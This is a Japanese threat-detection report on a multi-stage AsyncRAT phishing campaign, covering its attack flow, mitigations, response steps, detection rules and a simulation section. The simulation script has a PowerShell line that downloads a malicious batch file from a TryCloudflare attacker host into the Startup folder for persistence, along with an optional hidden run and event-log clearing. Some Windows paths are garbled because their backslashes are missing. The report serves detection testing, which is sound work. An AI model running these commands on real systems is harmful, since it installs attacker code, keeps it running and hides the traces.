MDRが明らかにしたマルチステージのAsyncRAT攻撃チェーン
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
このレポートは、フィッシングメールによって開始される多段階の侵入チェーンについて説明しています。これには、二重拡張子ZIPルアーを配信し、WebDAVホストのペイロードシーケンスに移行することが含まれます。オペレーターはCloudflareの無料ティアインフラストラクチャとバンドルされたPythonコンポーネントを利用してAsyncRATを被害者のエンドポイントに展開します。実行と持続性は、Windows Script Host、PowerShell、バッチスクリプトなどのネイティブなWindowsツールに依存していますが、最終段階ではexplorer.exeへのコードインジェクションが使用されます。信頼性の高いクラウドサービスを通じて配信とステージングをルーティングすることで、活動は通常のトラフィックに溶け込み、従来の境界制御を回避できます。
調査
トレンドマイクロの調査者は、ステージド配信フローと一致するテレメトリを報告しました。これは、Dropboxからの.pdf.zipアーカイブの取得、埋め込まれた.urlショートカットの実行、svchost.exeおよびrundll32.exeに起因するその後のWebDAVインタラクションを含んでいます。このチェーンは、AsyncRATシェルコードのAPCインジェクションを担当するカスタムPythonスクリプトを実行するために使用されたPython 3.14.0埋め込みファイルを展開しました。持続性は、ユーザーのスタートアップディレクトリにバッチファイルを配置することで達成されました。アナリストはまた、インフラストラクチャをサポートする複数のTryCloudflareホストを特定し、相関させました。
緩和策
二重拡張子アーカイブや予期しないZIP添付ファイルを疑わしいものとして扱うようにユーザーを訓練し、フィッシングで配信されるクラウドリンク用のフィルタリングを強化することで、露出を減らします。承認されていないクラウドトンネリングサービスへのアクセスをブロックまたは厳密に制御し、WebDAVの異常な依存度を監視します。ユーザー書き込み可能なディレクトリからのスクリプト実行を制限し、スタートアップフォルダの使用とタスクスケジュール作成に対する制御を強化します。EPR/行動検出を優先し、スクリプト駆動の実行チェーンや、正常なプロセスをターゲットにしたコード注入技術を表面化することができるものを優先します。
対応
活動が検出された場合、エンドポイントを隔離し、チェーンに関連する疑わしいプロセス(特にsvchost.exe、rundll32.exe、およびインシデントに関連する場合のpython.exe)を停止します。持続性を削除するには、スタートアップディレクトリから悪意のあるバッチアーティファクトを削除し、ダウンロードされたPythonアーカイブおよびすべてのAsyncRATコンポーネントを根絶し、追加のステージングファイルと横方向の移動を検出するための完全な法医学調査を実行します。ネットワーク制御とブロックリストを更新して、特定されたTryCloudflareドメインおよびトリアージ中に観察された関連インフラストラクチャを含めます。
攻撃フロー
検知
PowerShellを介したダウンロードまたはアップロード(cmdline経由)
表示
LOLBAS WScript / CScript(process_creation経由)
表示
異常なディレクトリで作成されたPythonファイル(file_event経由)
表示
疑わしいTrycloudflareドメイン通信(プロキシ経由)
表示
珍しいフォルダで実行された可能性のあるスクリプトまたは操作が行われました(cmdline経由)
表示
疑わしいTrycloudflareドメイン通信(dns経由)
表示
IOCs(DestinationIP)を検出する: 管理型検出と応答によるマルチステージAsyncRATキャンペーンの分析
表示
IOCs(SourceIP)を検出する: 管理型検出と応答によるマルチステージAsyncRATキャンペーンの分析
表示
環境セットアップと持続性のためのPythonおよびバッチファイルをダウンロードするPowerShellコマンド [Windows Powershell]
表示
コードインジェクションのためにPythonスクリプトを実行するためのEdgeおよびCmdを使用したフィッシングキャンペーン [Windowsプロセス作成]
表示
シミュレーション実行
前提条件: テレメトリー&ベースライン事前フライトチェックが合格していること。
-
攻撃のストーリー&コマンド
初期のPowerShellアクセスを獲得した敵は、Python実行環境をセットアップし、持続性を確立しようとしています。彼らは:
- 埋め込まれたPythonディストリビューションをダウンロード 直接ユーザーのローカル
Tempディレクトリを使用してInvoke‑WebRequest. - 悪意のあるバッチスクリプトをダウンロード (
ahke.bat) をCloudflare経由でプロキシされたドメインからユーザーのスタートアップフォルダーにダウンロードし、ログオン時に実行されるようにします。 - ダウンロードしたPython ZIPを実行 (省略のため詳細は省略)して、さらなるペイロードを実行します。
これらのステップは、Sigmaルールによって一致する正確なコマンド文字列を生成し、
iwr … -OutFile …パターンを持つPowerShellスクリプトブロックログを生成します。 - 埋め込まれたPythonディストリビューションをダウンロード 直接ユーザーのローカル
-
回帰テストスクリプト
# ------------------------------------------------- # PowerShellによるAsyncRAT環境設定のシミュレーション # ------------------------------------------------- # 1. ユーザーテンプフォルダにPython埋め込みZIPをダウンロード $pythonUrl = 'https://www.python.org/ftp/python/3.14.0/python-3.14.0-embed-amd64.zip' $pythonDest = "$env:USERPROFILEAppDataLocalTempp.zip" iwr $pythonUrl -OutFile $pythonDest # 2. 持続性のための悪意のあるバッチファイルをスタートアップにダウンロード $batUrl = 'https://plus-condos-thy-redeem.trycloudflare.com/ahke.bat' $batDest = "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupahke.bat" iwr $batUrl -OutFile $batDest # 3. (オプション)持続性を実証するためにバッチの実行をトリガー # Start-Process -FilePath $batDest -WindowStyle Hidden # ------------------------------------------------- -
クリーンアップコマンド
# ダウンロードされたアーティファクトを削除 Remove-Item -Path "$env:USERPROFILEAppDataLocalTempp.zip" -ErrorAction SilentlyContinue Remove-Item -Path "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupahke.bat" -ErrorAction SilentlyContinue # オプションでPowerShellスクリプトブロックログをクリア(管理者権限が必要) # Clear-EventLog -LogName "Microsoft-Windows-PowerShell/Operational"